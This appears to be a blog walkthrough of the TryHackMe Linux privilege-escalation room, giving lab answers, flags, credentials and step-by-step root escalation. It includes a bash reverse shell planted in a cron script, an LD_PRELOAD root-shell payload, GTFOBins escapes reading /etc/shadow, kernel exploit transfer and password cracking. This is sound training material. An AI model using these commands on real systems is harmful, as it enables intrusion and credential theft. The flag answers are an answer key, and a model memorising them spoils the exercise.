TryHackMe —Jr Penetration Tester — Privilege Escalation — Linux PrivEsc

Deepak Kushwah

9 min readNov 2, 2021

Room 1 — Linux PrivEsc

Task 1 Introduction

Read only task !!

Task 2 What is Privilege Escalation?

Read only task !!

Task 3 Enumeration

Answer the questions below

Q 1. What is the hostname of the target system?

Ans. wade7363

Q 2. What is the Linux kernel version of the target system?

Ans. 3.13.0–24-generic

Q 3. What Linux is this?

Ans. Ubuntu 14.04 LTS

Q 4. What version of the Python language is installed on the system?

Ans. 2.7.6

Q 5. What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)

Ans. CVE-2015–1328

Task 4 Automated Enumeration Tools

Read only task !!

Task 5 Privilege Escalation: Kernel Exploits

Statement :- Note: Launch the target machine attached to this task to follow along.

You can launch the target machine and access it directly from your browser.

Alternatively, you can access it over SSH with the low-privilege user credentials below:

Username: karen

Password: Password1

exploit search on google —

Offensive Security's Exploit Database Archive

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation. CVE-2015-1328 …

www.exploit-db.com

download the exploit to attacker machine start python3 http.server and transfer it to target machine using wget

hint* — find a folder for that all users have read write and execute access

after transferring the exploit to target machine use gcc <transferred file name> -o <name_exploit >

now we check id it will show karen

run exploit ./<file name>

check id we will get root rights.

Q 1. What is the content of the flag1.txt file?

Ans. THM-28392872729920

Task 6 Privilege Escalation: Sudo

Answer the questions below

Solution 1: — using https://gtfobins.github.io/

https://gtfobins.github.io/ is a valuable source that provides information on how any program, on which you may have sudo rights, can be used.

As we know user karen has three programs on target system with sudo rights.

let’s check with nano.

Just search nano at https://gtfobins.github.io/ and we got function named as sudo, let’s check it.

now let’s run “sudo nano” on target machine

Now press ctrl+R

then ctrl+X to move on execute a command mode

now we are on execute a command mode

Now we ran command “reset; sh 1>&0 2>&0"as mentioned in GTFOBins

Now we got the shell, let’s check user i’d.

let’s capture the flag.

Solution 2: — Following task info

The steps of this privilege escalation vector can be summarized as follows;

Check for LD_PRELOAD (with the env_keep option)
Write a simple C code compiled as a share object (.so extension) file
Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

The C code will simply spawn a root shell and can be written as follows;

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv(“LD_PRELOAD”);
setgid(0);
setuid(0);
system(“/bin/bash”);
}

We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters;

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Creating the shell and transferring the executable shell

We need to run the program by specifying the LD_PRELOAD option, as follows;

sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

This will result in a shell spawn with root privileges.

Q 1. How many programs can the user “karen” run on the target system with sudo rights?

Q 2. What is the content of the flag2.txt file?

Ans. THM-402028394

Q 3. How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

Ans. sudo nmap — interactive

Q 4. What is the hash of frank’s password?

Ans. $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1

Task 7 Privilege Escalation: SUID

Answer the questions below

Q 1. Which user shares the name of a great comic book writer?

Ans. gerryconway

Just use cat/etc/passwd and hit and tril method

Q 2. What is the password of user2?

Ans. Password1

Solution: — Now we need to do a privilege escalation

Now we know that we can check SUID funtions on GTFOBins

Much of Linux privilege controls rely on controlling the users and files interactions. This is done with permissions. By now, you know that files can have read, write, and execute permissions. These are given to users within their privilege levels. This changes with SUID (Set-user Identification) and SGID (Set-group Identification). These allow files to be executed with the permission level of the file owner or the group owner, respectively.

You will notice these files have an “s” bit set showing their special permission level.

find / -type f -perm -04000 -ls 2>/dev/null will list files that have SUID or SGID bits set

let’s run this — find / -type f -perm -04000 -ls 2>/dev/null

We got that /usr/bin/base64 , we can use this for our privilege escalation

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode

We got user2’s password hash, now crack it using john we got the password.

Q 3. What is the content of the flag3.txt file?

Ans. THM-3847834

Task 8 Privilege Escalation: Capabilities

Q 1. How many binaries have set capabilities?

Ans. 6

Q 2. What other binary can be used through its capabilities?

Ans. view

Q 3. What is the content of the flag4.txt file?

Ans. THM-9349843

Search capabilities for View

now run below cmd — /home/ubuntu/view -c ':pye import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

after this we will get a new shell

Task 9 Privilege Escalation: Cron Jobs

now modify the backup.sh cronjob to start reverse shell

bash -i >& /dev/tcp/10.10.137.81/4242 0>&1

Hint: — dont forget to provide execute +x rights to backup.sh

Now run a listener on attacker machine and wait for around 1 and 2 mins

Q 1 .How many cron jobs can you see on the target system?

Ans. 4

Q 2. What is the content of the flag5.txt file?

Ans. THM-383000283

Q 3. What is Matt’s password?

Ans. 123456

cat /etc/shadow — we got the password hash

now using John we can crack it.

sudo john p1.txt — wordlist=/usr/share/wordlists/rockyou.txt

sudo john — show p1.txt

Task 10 Privilege Escalation: PATH

be sure you can answer the questions below before trying this.

What folders are located under $PATH
Does your current user have write privileges for any of these folders?
Can you modify $PATH?
Is there a script/application you can start that will be affected by this vulnerability?

find / -writable 2>/dev/null | cut -d “/” -f 2 | sort -u

$ nano thm

$ echo “/bin/bash” > thm
$ chmod 777 thm
$ ls -l thm

$ ./thm

Answer the questions below

Q 1. What is the odd folder you have write access for?

Ans. /home/murdoch

Q 2. Exploit the $PATH vulnerability to read the content of the flag6.txt file.

Ans. read only!!

Q 3. What is the content of the flag6.txt file?

Ans. THM-736628929

Task 11 Privilege Escalation: NFS

Answer the questions below

Q 1. How many mountable shares can you identify on the target system?

Ans. 3

Q 2. How many shares have the “no_root_squash” option enabled?

Ans. 3

Q 3. What is the content of the flag7.txt file?

Ans. THM-89384012

Solution: — The critical element for this privilege escalation vector is the “no_root_squash” option you can see above. By default, NFS will change the root user to nfsnobody and strip any file from operating with root privileges. If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system.

We will start by enumerating mountable shares from our attacking machine.

We will mount one of the “no_root_squash” shares to our attacking machine and start building our executable.

sudo mount -o rw 10.10.208.235:/home/ubuntu/sharedfolder /tmp/Share_at_target_machine/

Once we compile the code we will set the SUID bit.

sudo gcc nfs.c -o nfs -w

we will see below that both files (nfs.c and nfs are present on the target system. We have worked on the mounted share so there was no need to transfer them).